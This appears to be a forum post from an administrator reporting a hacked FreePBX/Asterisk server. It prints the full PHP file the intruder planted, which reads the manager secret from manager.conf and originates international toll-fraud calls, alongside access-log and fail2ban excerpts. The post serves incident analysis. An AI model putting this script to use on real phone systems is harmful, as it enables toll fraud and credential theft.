One of my customers was hacked over the weekend. Root was compromised and a file was created in /var/www.hmtl/ named .asterisk.php. The CDR data looks just like yours. This file was used to generate calls to Cuba. The system had no routes for international calls and none showed in the GUI.
Here are the contents of .asterisk.php:
$strUser = "admin";
$strSecret = system("cat /etc/asterisk/manager.conf | awk '/secret/ {print $3};'");
$tech = $_GET['tech'];
$number = "011".$_GET['number'];
$strChannel = $tech."/".$number;
$oSocket = fsockopen ("localhost", 5038, &$errno, &$errstr, 20);
if (!$oSocket) {
echo "$errstr ($errno)<br>\n";
} else {
fputs($oSocket, "Action: Login\r\n");
fputs($oSocket, "Username: $strUser\r\n");
fputs($oSocket, "Secret: $strSecret\r\n\r\n");
fputs($oSocket, "Action: Originate\r\n");
fputs($oSocket, "Channel: $strChannel\r\n");
fputs($oSocket, "Application: Wait\r\n");
fputs($oSocket, "Data: 1800\r\n");
fputs($oSocket, "CallerID: Asterisk<1000000000>\r\n\r\n");
fputs($oSocket, "Action: Logoff\r\n\r\n");
sleep(1);
fclose($oSocket);
}
echo "$number called.\r\n";
?>
Here is a snip of the httpd access log:
::1 - - [15/Apr/2017:15:47:13 -0500] "GET /.asterisk.php?tech=sip/TW&number=971558848092 HTTP/1.1" 200 32 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:47:38 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324210054 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:47:48 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424047 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:50:32 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424047 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:50:38 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424045 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
The process continued even after I blocked all inbound and outbound traffic the PBX at the customer’s perimeter firewall. It only stopped once I renamed the .asterisk.php file.
Fail2ban logs contains errors regarding the ::1 source address.
WARNING Unable to find a corresponding IP address for ::1: [Errno -9] Address family for hostname not supported
At this point I am not sure how the calls continued to be generated once traffic was blocked. I am not sure if I will find out. I am rebuilding the PBX on the latest distro and properly restricting traffic to the system.
This system is running Freepbx 12.0.76.4 fully patched and Asterisk 11.21.2. Port 5060 was exposed and SSH was accessible via port address translation on a port in the high 50000’s. My assumption is that the port was found via port scanner and somehow fail2ban did not properly ban SSH auth failures.